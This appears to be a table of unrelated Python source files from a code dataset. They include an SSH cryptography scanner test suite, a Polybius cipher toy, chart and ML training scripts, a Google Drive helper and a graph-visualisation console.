| id | content |
|---|---|
60026
|
import json
import os
import shutil
import subprocess
import sys
import tempfile
import unittest
sys.path.append("../main")
from algorithms import *
port = 2222
def sshd(**kwargs):
dirname = tempfile.mkdtemp()
confname = dirname + "/sshd_config"
logname = dirname + "/sshd.log"
with open(confname, "w") as conf:
print("LogLevel", "DEBUG3", file=conf)
print("ListenAddress", "127.0.0.1:2222", file=conf)
for key, value in kwargs.items():
if type(value) == str:
print(key, value.replace("${confdir}", dirname), file=conf)
else:
for val in value:
print(key, val.replace("${confdir}", dirname), file=conf)
for f in os.listdir("./config"):
shutil.copy("./config/" + f, dirname)
if f.startswith("ssh_host_") and f.endswith("_key") and "HostKey" not in kwargs:
print("HostKey", dirname + "/" + f, file=conf)
return subprocess.Popen([
"/usr/sbin/sshd",
"-f", confname,
"-E", logname,
"-D",
])
def scan(*args):
scanner = subprocess.Popen(
[ "../main/scanner.py", "--json" ] + [ "--" + arg for arg in args ] + [ "127.0.0.1:2222" ],
stdout=subprocess.PIPE
)
( stdout, stderr ) = scanner.communicate()
if scanner.returncode == 0:
return json.loads(stdout.decode())
else:
return None
def what(result):
return [ issue["what"] for issue in result["issues"] ]
class TestScanner(unittest.TestCase):
def tearDown(self):
self.sshd.terminate()
def test_djb(self):
self.sshd = sshd(
KexAlgorithms=KEX_ECDH_CURVE25519_SHA256,
HostKey="${confdir}/ssh_host_ed25519_key",
Ciphers="<EMAIL>"
)
results = scan("algorithms")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(r["kex_init"]["kex_algorithms"], [ KEX_ECDH_CURVE25519_SHA256 ])
self.assertEqual(r["kex_init"]["server_host_key_algorithms"], [ "ssh-ed25519" ])
self.assertEqual(r["kex_init"]["encryption_algorithms_c2s"], [ "<EMAIL>" ])
self.assertEqual(r["kex_init"]["encryption_algorithms_s2c"], [ "<EMAIL>" ])
def test_nsa(self):
self.sshd = sshd(
KexAlgorithms=",".join([
KEX_ECDH_NISTP521_SHA512,
KEX_ECDH_NISTP384_SHA384,
KEX_ECDH_NISTP256_SHA256,
]),
HostKey=[
"${confdir}/ssh_host_ecdsa521_key",
"${confdir}/ssh_host_ecdsa384_key",
"${confdir}/ssh_host_ecdsa256_key",
],
Ciphers="<EMAIL>,<EMAIL>"
)
results = scan("algorithms", "details")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(
r["kex_init"]["kex_algorithms"],
[ KEX_ECDH_NISTP521_SHA512, KEX_ECDH_NISTP384_SHA384, KEX_ECDH_NISTP256_SHA256 ]
)
self.assertEqual(
r["kex_init"]["server_host_key_algorithms"],
[SIGN_ECDSA_NISTP521_SHA512,SIGN_ECDSA_NISTP384_SHA384,SIGN_ECDSA_NISTP256_SHA256]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_c2s"],
[ "<EMAIL>", "<EMAIL>" ]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_s2c"],
[ "<EMAIL>", "<EMAIL>" ]
)
self.assertTrue(any([ x == "Key exchange: unsafe elliptic curve" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: requires per-signature entropy" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: unsafe elliptic curve" for x in what(r) ]))
def test_old(self):
self.sshd = sshd(
KexAlgorithms=",".join([ KEX_DH_GROUP1_SHA1, KEX_DH_GROUP14_SHA1 ]),
HostKey=[ "${confdir}/ssh_host_rsa1024_key", "${confdir}/ssh_host_dsa_key" ],
HostKeyAlgorithms="ssh-rsa,ssh-dss",
Ciphers="3des-cbc,arcfour",
MACs="hmac-md5"
)
results = scan("algorithms", "instructions")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(
r["kex_init"]["kex_algorithms"],
[ KEX_DH_GROUP1_SHA1, KEX_DH_GROUP14_SHA1 ]
)
self.assertEqual(
r["kex_init"]["server_host_key_algorithms"],
[ SIGN_RSA_SHA1, SIGN_RSA_SHA512, SIGN_RSA_SHA256, SIGN_DSA ]
)
self.assertEqual(r["kex_init"]["encryption_algorithms_c2s"], [ "3des-cbc","arcfour" ])
self.assertEqual(r["kex_init"]["encryption_algorithms_s2c"], [ "3des-cbc","arcfour" ])
self.assertEqual(r["kex_init"]["mac_algorithms_c2s"], [ "hmac-md5" ])
self.assertEqual(r["kex_init"]["mac_algorithms_s2c"], [ "hmac-md5" ])
self.assertTrue(any([ x == "Key exchange: weak hash" for x in what(r) ]))
self.assertTrue(any([ x == "Key exchange: small DH group" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: small key size" for x in what(r) ]))
self.assertTrue(any([ x == "Signature: requires per-signature entropy" for x in what(r) ]))
self.assertTrue(any([ x == "Cipher: small block size" for x in what(r) ]))
self.assertTrue(any([ x == "Authenticated encryption: CBC-and-MAC" for x in what(r) ]))
def test_classic(self):
self.sshd = sshd(
KexAlgorithms=",".join([ KEX_DH_GEX_SHA256 ]),
HostKey=[ "${confdir}/ssh_host_rsa2048_key" ],
Ciphers="aes256-ctr,aes192-ctr,aes128-ctr",
MACs="hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com"
)
results = scan("algorithms", "details", "fast", "instructions")
self.assertEqual(len(results), 1)
for r in results:
self.assertEqual(r["host"], "127.0.0.1")
self.assertEqual(r["port"], 2222)
self.assertEqual(r["kex_init"]["kex_algorithms"], [ KEX_DH_GEX_SHA256 ])
self.assertEqual(
r["kex_init"]["server_host_key_algorithms"],
[ SIGN_RSA_SHA1, SIGN_RSA_SHA512, SIGN_RSA_SHA256 ]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_c2s"],
[ "aes256-ctr", "aes192-ctr", "aes128-ctr" ]
)
self.assertEqual(
r["kex_init"]["encryption_algorithms_s2c"],
[ "aes256-ctr", "aes192-ctr", "aes128-ctr" ]
)
self.assertEqual(
r["kex_init"]["mac_algorithms_c2s"],
[
"hmac-sha2-512-etm@openssh.com",
"hmac-sha2-256-etm@openssh.com",
"hmac-ripemd160-etm@openssh.com",
"umac-128-et<EMAIL>",
]
)
self.assertEqual(
r["kex_init"]["mac_algorithms_s2c"],
[
"hmac-sha2-512-etm@openssh.com",
"hmac-sha2-256-etm@openssh.com",
"hmac-ripemd160-etm@<EMAIL>",
"umac-<EMAIL>-<EMAIL>",
]
)
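# Optional entry point so the suite can be run directly; assumes /usr/sbin/sshd and
# ../main/scanner.py are available, as the sshd() and scan() helpers above expect.
if __name__ == "__main__":
    unittest.main()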
|
60042
|
from string import ascii_uppercase as alphabet
def codes_table(char):
table = {
"A": 11, "B": 21, "C": 31, "D": 41, "E": 51,
"F": 12, "G": 22, "H": 32, "I": 42, "K": 52,
"L": 13, "M": 23, "N": 33, "O": 43, "P": 53,
"Q": 14, "R": 24, "S": 34, "T": 44, "U": 54,
"V": 15, "W": 25, "X": 35, "Y": 45, "Z": 55, "J": 0,
11: "A", 21: "B", 31: "C", 41: "D", 51: "E",
12: "F", 22: "G", 32: "H", 42: "I", 52: "K",
13: "L", 23: "M", 33: "N", 43: "O", 53: "P",
14: "Q", 24: "R", 34: "S", 44: "T", 54: "U",
15: "V", 25: "W", 35: "X", 45: "Y", 55: "Z", 0: "J"
}
return table[char]
def encoding(text):
text, finished_text = text.upper(), ""
for symbol in text:
if symbol in alphabet:
finished_text += str(codes_table(symbol)) + " "
return finished_text
def decoding(text):
text, finished_text = text.upper(), ""
for symbol in list(map(int, text.split())):
finished_text += codes_table(symbol)
return finished_text
def assembly(mode):
text = str(input("[+] Enter your text - "))
if mode == 0:
finished_text = encoding(text)
else:
finished_text = decoding(text)
print("\n »» The result of encoding by Morse algorithm. ««")
print(finished_text)
def main():
print("[x] Polybius Square cryptography algorithm. [x]")
print(" • 0. Encoding mode.\n • 1. Decoding mode.")
mode = int(input("[?] Select program mode - "))
assembly(mode)
if __name__ == '__main__':
main()
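# Illustrative round trip using the square above (H→32, E→51, L→13, O→43; J is coded as 0):
# encoding("HELLO")          -> "32 51 13 13 43 "
# decoding("32 51 13 13 43") -> "HELLO"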
|
60058
|
from pydantic import BaseModel, constr
def other_func(regex):
pass
class Model(BaseModel):
abc: str = other_func(regex='<caret>[^a-zA-Z]+')
|
60098
|
from pyecharts import options as opts
from pyecharts.charts import Scatter
from pyecharts.commons.utils import JsCode
from pyecharts.faker import Faker
c = (
Scatter()
.add_xaxis(Faker.choose())
.add_yaxis(
"商家A",
[list(z) for z in zip(Faker.values(), Faker.choose())],
label_opts=opts.LabelOpts(
formatter=JsCode(
"function(params){return params.value[1] +' : '+ params.value[2];}"
)
),
)
.set_global_opts(
title_opts=opts.TitleOpts(title="Scatter-多维度数据"),
tooltip_opts=opts.TooltipOpts(
formatter=JsCode(
"function (params) {return params.name + ' : ' + params.value[2];}"
)
),
visualmap_opts=opts.VisualMapOpts(
type_="color", max_=150, min_=20, dimension=1
),
)
.render("scatter_multi_dimension.html")
)
|
60106
|
from bluetooth_communication import AndroidAPI, AndroidThread, AndroidExploreRunThread
from pc_communication import PcThread, PcExploreRunThread
from serial_stub import SerialAPIStub
__author__ = 'Danyang'
if __name__=="__main__":
print "Executing main flow"
serial_api = SerialAPIStub()
android_api = AndroidAPI(serial_api)
android_thread = AndroidThread("android", android_api, mode="auto", production=True)
explore_run_thread = AndroidExploreRunThread("explore_run_bluetooth", android_thread.android_api)
pc_thread = PcThread("pc_thread", serial_api, android_api)
pc_explore_run_thread = PcExploreRunThread("explore_run_pc", pc_thread.pc_api)
android_thread.start()
explore_run_thread.start()
pc_thread.start()
pc_explore_run_thread.start()
|
60179
|
import os
import subprocess
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.nn.functional import interpolate
from loguru import logger
from tqdm import tqdm
import numpy as np
import wandb
from draw_concat import draw_concat
from generate_noise import generate_spatial_noise
from minecraft.level_utils import one_hot_to_blockdata_level, save_level_to_world, clear_empty_world
from minecraft.level_renderer import render_minecraft
from models import calc_gradient_penalty, save_networks
from utils import interpolate3D
def update_noise_amplitude(z_prev, real, opt):
""" Update the amplitude of the noise for the current scale according to the previous noise map. """
RMSE = torch.sqrt(F.mse_loss(real, z_prev))
return opt.noise_update * RMSE
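# Worked example of the update above (illustrative toy numbers): if the RMSE between
# `real` and `z_prev` is 0.5 and opt.noise_update is 0.1, the returned amplitude is 0.05.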
def train_single_scale(D, G, reals, generators, noise_maps, input_from_prev_scale, noise_amplitudes, opt):
""" Train one scale. D and G are the current discriminator and generator, reals are the scaled versions of the
original level, generators and noise_maps contain information from previous scales and will receive information in
this scale, input_from_previous_scale holds the noise map and images from the previous scale, noise_amplitudes hold
the amplitudes for the noise in all the scales. opt is a namespace that holds all necessary parameters. """
current_scale = len(generators)
clear_empty_world(opt.output_dir, 'Curr_Empty_World') # reset tmp world
if opt.use_multiple_inputs:
real_group = []
nzx_group = []
nzy_group = []
nz_group = []
for scale_group in reals:
real_group.append(scale_group[current_scale])
nzx_group.append(scale_group[current_scale].shape[2])
nzy_group.append(scale_group[current_scale].shape[3])
nz_group.append((scale_group[current_scale].shape[2], scale_group[current_scale].shape[3]))
curr_noises = [0 for _ in range(len(real_group))]
curr_prevs = [0 for _ in range(len(real_group))]
curr_z_prevs = [0 for _ in range(len(real_group))]
else:
real = reals[current_scale]
nz = real.shape[2:]
padsize = int(1 * opt.num_layer) # As kernel size is always 3 currently, padsize goes up by one per layer
if not opt.pad_with_noise:
# pad_noise = nn.ConstantPad3d(padsize, 0)
# pad_image = nn.ConstantPad3d(padsize, 0)
pad_noise = nn.ReplicationPad3d(padsize)
pad_image = nn.ReplicationPad3d(padsize)
else:
pad_noise = nn.ReplicationPad3d(padsize)
pad_image = nn.ReplicationPad3d(padsize)
# setup optimizer
optimizerD = optim.Adam(D.parameters(), lr=opt.lr_d, betas=(opt.beta1, 0.999))
optimizerG = optim.Adam(G.parameters(), lr=opt.lr_g, betas=(opt.beta1, 0.999))
schedulerD = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerD, milestones=[1600, 2500], gamma=opt.gamma)
schedulerG = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizerG, milestones=[1600, 2500], gamma=opt.gamma)
if current_scale == 0: # Generate new noise
if opt.use_multiple_inputs:
z_opt_group = []
for nzx, nzy in zip(nzx_group, nzy_group):
z_opt = generate_spatial_noise([1, opt.nc_current, nzx, nzy], device=opt.device)
z_opt = pad_noise(z_opt)
z_opt_group.append(z_opt)
else:
z_opt = generate_spatial_noise((1, opt.nc_current) + nz, device=opt.device)
z_opt = pad_noise(z_opt)
else: # Add noise to previous output
if opt.use_multiple_inputs:
z_opt_group = []
for nzx, nzy in zip(nzx_group, nzy_group):
z_opt = torch.zeros([1, opt.nc_current, nzx, nzy]).to(opt.device)
z_opt = pad_noise(z_opt)
z_opt_group.append(z_opt)
else:
z_opt = torch.zeros((1, opt.nc_current) + nz).to(opt.device)
z_opt = pad_noise(z_opt)
logger.info("Training at scale {}", current_scale)
grad_d_real = []
grad_d_fake = []
grad_g = []
for p in D.parameters():
grad_d_real.append(torch.zeros(p.shape).to(opt.device))
grad_d_fake.append(torch.zeros(p.shape).to(opt.device))
for p in G.parameters():
grad_g.append(torch.zeros(p.shape).to(opt.device))
for epoch in tqdm(range(opt.niter)):
step = current_scale * opt.niter + epoch
if opt.use_multiple_inputs:
group_steps = len(real_group)
noise_group = []
for nzx, nzy in zip(nzx_group, nzy_group):
noise_ = generate_spatial_noise([1, opt.nc_current, nzx, nzy], device=opt.device)
noise_ = pad_noise(noise_)
noise_group.append(noise_)
else:
group_steps = 1
noise_ = generate_spatial_noise((1, opt.nc_current) + nz, device=opt.device)
noise_ = pad_noise(noise_)
for curr_inp in range(group_steps):
if opt.use_multiple_inputs:
real = real_group[curr_inp]
nz = nz_group[curr_inp]
z_opt = z_opt_group[curr_inp]
noise_ = noise_group[curr_inp]
prev_scale_results = input_from_prev_scale[curr_inp]
opt.curr_inp = curr_inp
else:
prev_scale_results = input_from_prev_scale
############################
# (1) Update D network: maximize D(x) + D(G(z))
###########################
for j in range(opt.Dsteps):
# train with real
D.zero_grad()
output = D(real).to(opt.device)
errD_real = -output.mean()
errD_real.backward(retain_graph=True)
grads_after = []
cos_sim = []
for i, p in enumerate(D.parameters()):
grads_after.append(p.grad)
cos_sim.append(nn.CosineSimilarity(-1)(grad_d_real[i], p.grad).mean().item())
diff_d_real = np.mean(cos_sim)
grad_d_real = grads_after
# train with fake
if (j == 0) & (epoch == 0):
if current_scale == 0: # If we are in the lowest scale, noise is generated from scratch
prev = torch.zeros((1, opt.nc_current) + nz).to(opt.device)
prev_scale_results = prev
prev = pad_image(prev)
z_prev = torch.zeros((1, opt.nc_current) + nz).to(opt.device)
z_prev = pad_noise(z_prev)
opt.noise_amp = 1
else: # First step when NOT in the lowest scale
# We need to adapt our inputs from the previous scale and add noise to it
prev = draw_concat(generators, noise_maps, reals, noise_amplitudes, prev_scale_results,
"rand", pad_noise, pad_image, opt)
prev = interpolate3D(prev, real.shape[-3:], mode="bilinear", align_corners=True)
prev = pad_image(prev)
z_prev = draw_concat(generators, noise_maps, reals, noise_amplitudes, prev_scale_results,
"rec", pad_noise, pad_image, opt)
z_prev = interpolate3D(z_prev, real.shape[-3:], mode="bilinear", align_corners=True)
opt.noise_amp = update_noise_amplitude(z_prev, real, opt)
z_prev = pad_image(z_prev)
else: # Any other step
if opt.use_multiple_inputs:
z_prev = curr_z_prevs[curr_inp]
prev = draw_concat(generators, noise_maps, reals, noise_amplitudes, prev_scale_results,
"rand", pad_noise, pad_image, opt)
prev = interpolate3D(prev, real.shape[-3:], mode="bilinear", align_corners=False)
prev = pad_image(prev)
# After creating our correct noise input, we feed it to the generator:
noise = opt.noise_amp * noise_ + prev
fake = G(noise.detach(), prev)
# Then run the result through the discriminator
output = D(fake.detach())
errD_fake = output.mean()
# Backpropagation
errD_fake.backward(retain_graph=False)
# Gradient Penalty
gradient_penalty = calc_gradient_penalty(D, real, fake, opt.lambda_grad, opt.device)
gradient_penalty.backward(retain_graph=False)
grads_after = []
cos_sim = []
for i, p in enumerate(D.parameters()):
grads_after.append(p.grad)
cos_sim.append(nn.CosineSimilarity(-1)(grad_d_fake[i], p.grad).mean().item())
diff_d_fake = np.mean(cos_sim)
grad_d_fake = grads_after
# Logging:
if step % 10 == 0:
wandb.log({f"D(G(z))@{current_scale}": errD_fake.item(),
f"D(x)@{current_scale}": -errD_real.item(),
f"gradient_penalty@{current_scale}": gradient_penalty.item(),
f"D_real_grad@{current_scale}": diff_d_real,
f"D_fake_grad@{current_scale}": diff_d_fake,
},
step=step, sync=False)
optimizerD.step()
if opt.use_multiple_inputs:
z_opt_group[curr_inp] = z_opt
input_from_prev_scale[curr_inp] = prev_scale_results
curr_noises[curr_inp] = noise
curr_prevs[curr_inp] = prev
curr_z_prevs[curr_inp] = z_prev
############################
# (2) Update G network: maximize D(G(z))
###########################
for j in range(opt.Gsteps):
G.zero_grad()
fake = G(noise.detach(), prev.detach(), temperature=1)
output = D(fake)
errG = -output.mean()
errG.backward(retain_graph=False)
grads_after = []
cos_sim = []
for i, p in enumerate(G.parameters()):
grads_after.append(p.grad)
cos_sim.append(nn.CosineSimilarity(-1)(grad_g[i], p.grad).mean().item())
diff_g = np.mean(cos_sim)
grad_g = grads_after
if opt.alpha != 0: # i.e. we are trying to find an exact recreation of our input in the latent space
Z_opt = opt.noise_amp * z_opt + z_prev
G_rec = G(Z_opt.detach(), z_prev, temperature=1)
rec_loss = opt.alpha * F.mse_loss(G_rec, real)
rec_loss.backward(retain_graph=False) # TODO: Check for unexpected argument retain_graph=True
rec_loss = rec_loss.detach()
else: # We are not trying to find an exact recreation
rec_loss = torch.zeros([])
Z_opt = z_opt
optimizerG.step()
# More Logging:
if step % 10 == 0:
wandb.log({f"noise_amplitude@{current_scale}": opt.noise_amp,
f"rec_loss@{current_scale}": rec_loss.item(),
f"G_grad@{current_scale}": diff_g},
step=step, sync=False, commit=True)
# Rendering and logging images of levels
if epoch % 500 == 0 or epoch == (opt.niter - 1):
token_list = opt.token_list
to_level = one_hot_to_blockdata_level
try:
subprocess.call(["wine", '--version'])
real_scaled = to_level(real.detach(), token_list, opt.block2repr, opt.repr_type)
# Minecraft World
worldname = 'Curr_Empty_World'
clear_empty_world(opt.output_dir, worldname) # reset tmp world
to_render = [real_scaled, to_level(fake.detach(), token_list, opt.block2repr, opt.repr_type),
to_level(G(Z_opt.detach(), z_prev), token_list, opt.block2repr, opt.repr_type)]
render_names = [f"real@{current_scale}", f"G(z)@{current_scale}", f"G(z_opt)@{current_scale}"]
obj_pth = os.path.join(opt.out_, f"objects/{current_scale}")
os.makedirs(obj_pth, exist_ok=True)
for n, level in enumerate(to_render):
pos = n * (level.shape[0] + 5)
save_level_to_world(opt.output_dir, worldname, (pos, 0, 0), level, token_list, opt.props)
curr_coords = [[pos, pos + real_scaled.shape[0]],
[0, real_scaled.shape[1]],
[0, real_scaled.shape[2]]]
render_pth = render_minecraft(worldname, curr_coords, obj_pth, render_names[n])
wandb.log({render_names[n]: wandb.Object3D(open(render_pth))}, commit=False)
except OSError:
pass
# Learning Rate scheduler step
schedulerD.step()
schedulerG.step()
# Save networks
if opt.use_multiple_inputs:
z_opt = z_opt_group
torch.save(z_opt, "%s/z_opt.pth" % opt.outf)
save_networks(G, D, z_opt, opt)
wandb.save(opt.outf)
return z_opt, input_from_prev_scale, G
|
60223
|
from __future__ import print_function
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
import sys
import json
SCOPES = ['https://www.googleapis.com/auth/drive','https://www.googleapis.com/auth/drive.file']
def delete_file(file_id):
creds = None
# The file token.json stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('./creds/token.json'):
creds = Credentials.from_authorized_user_file('./creds/token.json', SCOPES)
# If there are no (valid) credentials available, let the user log in.
# if this file isn't there, this may be a Heroku instance
elif os.path.exists('/app/google-credentials.json'):
creds = Credentials.from_authorized_user_file('/app/google-credentials.json', SCOPES)
else:
print("Please run upload upload.py before using it!!!")
sys.exit(1)
service = build('drive', 'v3', credentials=creds)
try:
service.files().delete(fileId = file_id).execute()
return 0
except Exception:
print("ERROR, file didn't get deleted")
return 1
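# Usage sketch (hypothetical Drive file id; returns 0 on success, 1 on failure):
# delete_file('1aBcD3fGhIjKlMnOpQrStUvWxYz')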
|
60247
|
class Leapx_org():
mul_num = 1.20
mul_num2 = 1.30
def __init__(self,first,last,pay):
self.f_name = first
self.l_name = last
self.pay_amt = pay
self.full_name = first+" "+last
@staticmethod
def check_amt(amt):
if amt <50000:
return True
else :
return False
def incrementpay(self):
if self.check_amt(self.pay_amt):
self.pay_amt = int(self.pay_amt*self.mul_num2)
else :
self.pay_amt = int(self.pay_amt*self.mul_num)
return self.pay_amt
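# Example of the rule above: 40000 is below 50000, so it gets the 1.30 multiplier (-> 52000),
# while 70000 gets 1.20 (-> 84000); these match the two objects created below.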
L_obj1 = Leapx_org('mohit', 'RAJ', 40000)
L_obj2 = Leapx_org('Ravender', 'Dahiya',70000)
L_obj1.incrementpay()
L_obj2.incrementpay()
print(L_obj1.pay_amt)
print(L_obj2.pay_amt)
|
60262
|
from pathlib import Path
from .build import DocBuilder
def finalize_builddir(repo_name):
'Bookkeeping on the docs build directory'
root = Path('_build') / repo_name
with open(root / '.nojekyll', 'w') as fh:
fh.write('')
def build_root(repo_name):
'''Build the top-level documentation.
See :py:mod:`.build` on building sub-projects.
'''
with DocBuilder(repo_name, '.') as builder:
builder.build()
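# Hypothetical sequence for a repo named "example-docs" (name is illustrative): build the
# top-level docs, then drop the .nojekyll marker so GitHub Pages serves the _build output as-is.
# build_root("example-docs")
# finalize_builddir("example-docs")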
|
60337
|
import script
from script import *
import random
import shlex
import edition
import layout
import query
import player
import test
import graph
import opendns
class Color(script.Script):
def __init__(self, console):
super(Color, self).__init__(console)
self.colors = {
"red" : [ 1.0, 0.0, 0.0, 1.0 ],
"green" : [ 0.0, 1.0, 0.0, 1.0 ],
"blue" : [ 0.0, 0.0, 1.0, 1.0 ],
"yellow" : [ 1.0, 1.0, 0.0, 1.0 ],
"cyan" : [ 0.0, 1.0, 1.0, 1.0 ],
"magenta" : [ 1.0, 0.0, 1.0, 1.0 ],
"white" : [ 1.0, 1.0, 1.0, 1.0 ],
"gray" : [ 0.5, 0.5, 0.5, 1.0 ],
"black" : [ 0.0, 0.0, 0.0, 1.0 ],
"orange" : [ 1.0, 0.4, 0.0, 1.0 ],
"purple" : [ 0.5, 0, 0.5, 1.0],
"pink" : [ 1.0, 0.75, 0.79, 1.0 ],
"brown" : [ 0.64, 0.16, 0.16, 1.0 ]
}
self.color_map = None
self.color_masks = {
"rgba" : [ True, True, True, True ],
"rgb" : [ True, True, True, False ],
"alpha" : [ False, False, False, True ]
}
def random_color(self):
return [ random.random(), random.random(), random.random(), 1.0 ]
def parse_color(self, s):
if s in self.colors:
return std.vec4_to_str(self.colors[s])
else:
return std.vec4_to_str(self.colors["black"])
def lambda_assign(self, element_type, element_id, color):
if element_type == "node":
og.set_node_attribute(element_id, "og:space:color", "vec4", color)
elif element_type == "edge":
og.set_edge_attribute(element_id, "og:space:color", "vec4", color)
def lambda_by(self, element_type, element_id, attr, color_map):
if element_type not in color_map:
color_map[element_type] = dict()
if element_type == "node":
value = og.get_node_attribute(element_id, attr)
elif element_type == "edge":
value = og.get_edge_attribute(element_id, attr)
if value is None:
color = std.vec4_to_str(self.colors["gray"])
else:
value = "{0}".format(value)
if value not in color_map[element_type]:
color_map[element_type][value] = self.random_color()
color = std.vec4_to_str(color_map[element_type][value])
if element_type == "node":
og.set_node_attribute(element_id, "og:space:color", "vec4", color)
elif element_type == "edge":
og.set_edge_attribute(element_id, "og:space:color", "vec4", color)
def lambda_op(self, element_type, element_id, op, color_mask, factor):
def calculate(op, v1, v2, mask):
if op == "add":
r = [ v1[i] + v2[i] for i in range(4) ]
elif op == "sub":
r = [ v1[i] - v2[i] for i in range(4) ]
elif op == "mul":
r = [ v1[i] * v2[i] for i in range(4) ]
elif op == "div":
r = [ v1[i] / v2[i] for i in range(4) ]
elif op == "set":
r = v2
else:
self.console.log("Error: '{0}': Unknown operator!")
return
for i in range(4):
if not mask[i]:
r[i] = v1[i]
return r
if element_type == "node":
color = og.get_node_attribute(element_id, "og:space:color")
og.set_node_attribute(element_id, "og:space:color", "vec4", std.vec4_to_str(calculate(op, color, factor, color_mask)))
elif element_type == "edge":
color = og.get_edge_attribute(element_id, "og:space:color1")
og.set_edge_attribute(element_id, "og:space:color1", "vec4", std.vec4_to_str(calculate(op, color, factor, color_mask)))
color = og.get_edge_attribute(element_id, "og:space:color2")
og.set_edge_attribute(element_id, "og:space:color2", "vec4", std.vec4_to_str(calculate(op, color, factor, color_mask)))
def run(self, args):
query = self.console.query
if query is None:
self.console.log("Error: Query is empty!")
return
if len(args) == 2:
color = self.parse_color(args[1])
if 'nodes' in query:
[ self.lambda_assign("node", nid, color) for nid in query['nodes'] ]
if 'edges' in query:
[ self.lambda_assign("edge", eid, color) for eid in query['edges'] ]
elif len(args) == 3 and args[1] == "by":
attr = args[2]
color_map = dict()
if 'nodes' in query:
[ self.lambda_by("node", nid, attr, color_map) for nid in query['nodes'] ]
if 'edges' in query:
[ self.lambda_by("edge", eid, attr, color_map) for eid in query['edges'] ]
elif len(args) >= 4 and args[1] in [ "mul", "div", "add", "sub", "set" ]:
if args[2] not in self.color_masks:
self.console.log("Error: '{0}': Unknown color mask!".format(args[2]))
return
array = [ float(i) for i in " ".join(args[3:]).split() ]
if len(array) == 1:
factor = [ array[0], array[0], array[0], array[0] ]
elif len(array) == 3:
factor = [ array[0], array[1], array[2], 1.0 ]
elif len(array) == 4:
factor = [ array[0], array[1], array[2], array[3] ]
else:
self.console.log("Error: Can't parse color factor!")
return
if 'nodes' in query:
[ self.lambda_op("node", nid, args[1], self.color_masks[args[2]], factor) for nid in query['nodes'] ]
if 'edges' in query:
[ self.lambda_op("edge", eid, args[1], self.color_masks[args[2]], factor) for eid in query['edges'] ]
class Help(script.Script):
def __init__(self, console):
super(Help, self).__init__(console)
def run(self, args):
self.console.log("Avalailable commands:")
self.console.log(", ".join(self.console.context['scripts'].keys()))
class Quit(script.Script):
def __init__(self, console):
super(Quit, self).__init__(console)
def run(self, args):
self.console.log("Terminating OpenGraphiti...")
og.quit()
class Native(script.Script):
def __init__(self, console):
super(Native, self).__init__(console)
def run(self, args):
exec(" ".join(args[1:]))
# ----- Callbacks -----
class OpenGraphiti(object):
def __init__(self):
self.ids = {
"node" : og.get_node_ids,
"edge" : og.get_edge_ids
}
self.setters = {
"graph" : og.set_attribute,
"node" : og.set_node_attribute,
"edge" : og.set_edge_attribute,
}
self.getters = {
"graph" : og.get_attribute,
"node" : og.get_node_attribute,
"edge" : og.get_edge_attribute,
}
def get_ids(self, entity_type):
if entity_type in self.ids:
return self.ids[entity_type]()
raise Exception("{0}: Unknown entity type!".format(entity_type))
def set_attribute(self, entity_type, entity_id, attr_name, attr_type, attr_value):
if entity_type in self.setters:
return self.setters[entity_type](entity_id, attr_name, attr_type, attr_value)
raise Exception("{0}: Unknown entity type!".format(entity_type))
def get_attribute(self, entity_type, entity_id, attr_name):
if entity_type in self.getters:
return self.getters[entity_type](entity_id, attr_name)
raise Exception("{0}: Unknown entity type!".format(entity_type))
class Console(object):
def __init__(self):
self.context = {
"scripts" : {
"info" : edition.Info(self),
"load" : edition.Load(self),
"save" : edition.Save(self),
"screenshot" : edition.Screenshot(self),
"set" : edition.Set(self),
"get" : edition.Get(self),
"remove" : edition.Remove(self),
"map" : edition.Map(self),
"clear" : edition.Clear(self),
"select" : query.Select(self),
"filter" : query.Filter(self),
"query" : query.Query(self),
"layout" : layout.Layout(self),
"play" : player.Play(self),
"stop" : player.Stop(self),
"topo" : graph.Topology(self),
"test" : test.Test(self),
"help" : Help(self),
"color" : Color(self),
"quit" : Quit(self),
"opendns" : opendns.OpenDNS(self),
"py" : Native(self)
}
}
self.query = dict()
self.api = OpenGraphiti()
def log(self, text):
og.console({ 'log' : text })
def print_query(self):
s = "Entities: "
key_count = 0
for key in self.query.keys():
if key_count > 0:
s += ", "
s += "#{0}={1}".format(key, len(self.query[key]))
key_count += 1
self.log(s)
def execute(self, command):
lex = shlex.shlex(command, posix=True)
lex.whitespace_split = True
args = list(lex)
if 'scripts' in self.context and args[0] in self.context['scripts']:
self.context['scripts'][args[0]].run(args)
else:
# TODO: og.console("{0}: Command not found!".format(args[0]))
self.log("{0}: Command not found!".format(args[0]))
|
60344
|
from sklearn.base import BaseEstimator
import yake
from ._prep import TextPrep
class YakeTextPrep(TextPrep, BaseEstimator):
"""
Remove all text except meaningful key-phrases. Uses [yake](https://github.com/LIAAD/yake).
Arguments:
top_n: number of key-phrases to select
unique: only return unique keywords from the key-phrases
Usage:
```python
from tokenwiser.textprep import YakeTextPrep
text = ["Sources tell us that Google is acquiring Kaggle, a platform that hosts data science and machine learning"]
example = YakeTextPrep(top_n=3, unique=False).transform(text)
assert example[0] == 'hosts data science acquiring kaggle google is acquiring'
```
"""
def __init__(self, top_n: int = 5, unique: bool = False):
self.top_n = top_n
self.unique = unique
self.extractor = yake.KeywordExtractor(top=self.top_n)
def encode_single(self, text):
texts = " ".join([t[0] for t in self.extractor.extract_keywords(text)])
if not self.unique:
return texts
return " ".join(set(texts.split(" ")))
|
60352
|
from flask import Blueprint
